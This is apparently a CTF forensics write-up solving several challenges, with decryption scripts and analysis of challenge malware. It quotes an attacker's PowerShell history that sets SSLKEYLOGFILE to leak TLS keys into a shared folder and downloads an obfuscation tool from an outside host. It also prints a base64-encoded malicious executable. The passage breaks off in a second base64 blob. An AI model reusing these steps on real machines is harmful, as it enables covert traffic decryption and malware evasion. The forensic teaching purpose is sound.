> For the complete documentation index, see [llms.txt](https://kos0ng.gitbook.io/ctfs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kos0ng.gitbook.io/ctfs/write-up/2024/akasec-ctf/forensic.md).
# Forensic
From the higlighted line we know the key, iv, and algorithm. Write script to automate decryption process of the encrypted file.
```python
from Crypto.Cipher import DES3
import glob
key = b"Lp3jXluuW799rnu4"
iv = [0,
1,
2,
3,
4,
5,
6,
7]
iv = bytes(iv)
# for i in glob.glob("saveme-chall/*.jpg"):
for i in glob.glob("saveme-chall/*.png"):
f = open(i, "rb").read()
cipher = DES3.new(key, DES3.MODE_CBC, iv)
out = open("out/"+i.split("/")[-1], "wb")
out.write(cipher.decrypt(f))
```
Open the images (144).png and got the flag
Flag: AKASEC{F\_MiCRoSft\_777}
## Sharing is Not Caring (257 pts)
### Description
My friends and I use the same computer on campus and have a shared folder to exchange files. After submitting the flag for the challenge, it was leaked, and someone obtained it without my knowledge. I'm unsure how they got it.
Author : **d33znu75**
### Solution
Given file ad1 and pcap. Open the pcap file using wireshark. There are several http traffic and there is suspicious URL which is freerambooster.000webhostapp.com.
Access the URL and click download button
Open FREE\_RAM.exe using dnSpy or ILSpy.
Looks like the executable run several powershell command, lets take a look on powershell history. Open ad01 file using ftk imager then go to .
```
C:\users\yuno miles\AppData\Roaming\Microsoft\windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```
```
Install-Module ps2exe
$directoryPath = "C:\Users\Public\Document\Internet Explorer\SIGNUP\"
$sslKeyLogFile = Join-Path $directoryPath "sslkey.log"
[System.Environment]::SetEnvironmentVariable('SSLKEYLOGFILE', $sslKeyLogFile, 'Machine')
if (-not (Test-Path $sslKeyLogFile)) {`
New-Item -Path $sslKeyLogFile -ItemType File`
}
[System.Environment]::SetEnvironmentVariable('SSLKEYLOGFILE', '', 'Machine')
cd ../..
ls
cd '.\Users\yuno miles\'
cd .\Desktop\
cd .\Invoke-Stealth-main\
.\Invoke-Stealth.ps1
powershell iwr -useb https://darkbyte.net/invoke-stealth.php -outfile Invoke-Stealth.ps1
.\Invoke-Stealth.ps1
Invoke-Stealth
.\Invoke-Stealth
Set-ExecutionPolicy RemoteSigned
.\Invoke-Stealth
.\Invoke-Stealth ..\free_raw.ps1 Chameleon
.\Invoke-Stealth ..\free_raw.ps1 -technique Chameleon
.\Invoke-Stealth ..\free_raw.ps1 -technique all
.\Invoke-Stealth ..\free_raw.ps1 -technique PyFuscation
.\Invoke-Stealth -help
.\Invoke-Stealth ..\free_raw.ps1 -technique ReverseB64
[System.Environment]::SetEnvironmentVariable('SSLKEYLOGFILE', '', 'Machine')
```
So there is sslkey.log stored at SIGNUP directory, it will be very useful because it will let us decrypt the SSL traffic. There is no sslkey.log in SIGNUP directory but there is sslkey.log in SIGNUP\ink directory.
Load the sslkey.log file by clicking preferences > Protocols > TLS > (Pre)-Master-Secret log filename. After that look at HTTP2 traffic and there will be request to URL that contains flag.
Flag: AKASEC{B4s1c\_M4lw4r3\_4nd\_PC4P\_4n4lys1s}
## Snooz (436 pts)
### Description
don't wake me up, I want a snooze u will find everything on my laptop!!
Author: **samaqlo**
### Solution
Given memory dump and pcap file. Open pcap file using wireshark. There are several HTTP traffic and there is suspicious HTTP request which is /download.dat.
Decode the string and write to file.
```python
import base64
a = "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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
out = open("download.exe", "wb")
out.write(base64.b64decode(a))
```
Open the executable using dnSpy.
So the original executable name should be snooz.exe. Lets check available process on memory dump.
```
python .\vol.py -f .\ctf\akasec\snooz\snooz_chall\memdump.mem windows.pslist
```
We can see on image above that there is snooz.exe with PID 3200. Dump the executable using command below
```
python .\vol.py -f .\ctf\akasec\snooz\snooz_chall\memdump.mem -o .\ctf\akasec\snooz\ windows.dumpfiles --pid 3200
```
Open file.0xa38425992e50.0xa384269f2150.ImageSectionObject.snooz.exe.img using dnSpy. Look at class a.
* So it use AES as the encryption algorithm with mode ECB. For the key the value is from the second argument.
Through analyze feature we can see which line of code that call the a.b function.
```csharp
byte[] array5 = global::a.b(array4, .c(num6, num7, num8));
```
So the key is \.c(num6, num7, num8), lets take a look on \.c
internal static string c(int A_0, int A_1, int A_2)
{
A_0 += 593;
Assembly executingAssembly = Assembly.GetExecutingAssembly();
A_1 -= 331;
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream("resource");
int num = A_0 ^ A_1;
num = num * 17 / 27;
manifestResourceStream.Seek((long)(7 + num), SeekOrigin.Begin);
byte[] array = new byte[8];
manifestResourceStream.Read(array, 0, 4);
int num2 = (BitConverter.ToInt32(array, 0) ^ 2100157544) - 100;
manifestResourceStream.Read(array, 0, 4);
int num3 = BitConverter.ToInt32(array, 0) - 5 ^ 485648943;
manifestResourceStream.Seek((long)num2, SeekOrigin.Begin);
array = new byte[num3];
manifestResourceStream.Read(array, 0, num3);
for (int i = 0; i < array.Length; i++)
{
array[i] = (byte)((int)array[i] ^ A_2);
}
return Encoding.UTF8.GetString(array);
}
* Basically it just do xor with data in resource named "resource". A\_2 is static value and the size of each value in array is 1 byte. So in this case we can just search the value for A\_2 then iterate on all data in "resource".
```csharp
num8 = ((num9 + (q << 20) + 483840 == (int)((uint)(~(uint)(q * 1073741824)) >> 17)) ? (Type.EmptyTypes.Length + -1963321438) : (Type.EmptyTypes.Length + 182));
```
So there is two possible value for num8, (Type.EmptyTypes.Length + -1963321438) or (Type.EmptyTypes.Length + 182). Type.EmptyTypes.Length is 0 (we can validate it through running the code). So the possibility is negative value or 182. 182 looks like legit value because it is 1 byte so lets try to iterate the resource using 182 as A\_2.
```python
from pwn import xor
f = open("resources.dump", "rb").read()
key = b"\xb6" * 16
for i in range(0, len(f) - 16):
print(i, xor(f[i:i+16], key))
```
There is suspicious string that looks like a key which is at index 315. On function a.a we can see that the executable listen at port 1337. So lets open the pcap again and filter for port 1337.
```csharp
TcpListener tcpListener = new TcpListener(IPAddress.Any, 1337);
```
```python
from Crypto.Cipher import AES
list_ct = ["12c6b9acfc4f81810dd21f652bbfd6af", "6f3171b1be6ae86b058cbee8887f29a3", "61d21ef8f12ff0594c4d217a3feef8a7d993e4c7bb1fea531af0e6259c4b466629e89109ed1d5ba3f3534dacc171266613ae8d24b73bef16426d079dd1d630011899962bd6e1cf2e574ebce9cc224f626fc58fea72add0be454ab6294fe2df119cce1284440e409fc07aa482de82a1b2", "0e449b0133eed2e00a240569c4650ffa"]
key = b"fr33___p4l3571n3"
cipher = AES.new(key, AES.MODE_ECB)
for ct in list_ct:
print(cipher.decrypt(bytes.fromhex(ct)))
```
"pastecode" mentioned on the text and there is password also "5n00zm3m3rbr0z". Because i can't find the pastecode link i tried to do simple grep string on the memory dump.
Decode the base64 value then write it to file.
```python
import base64
a = "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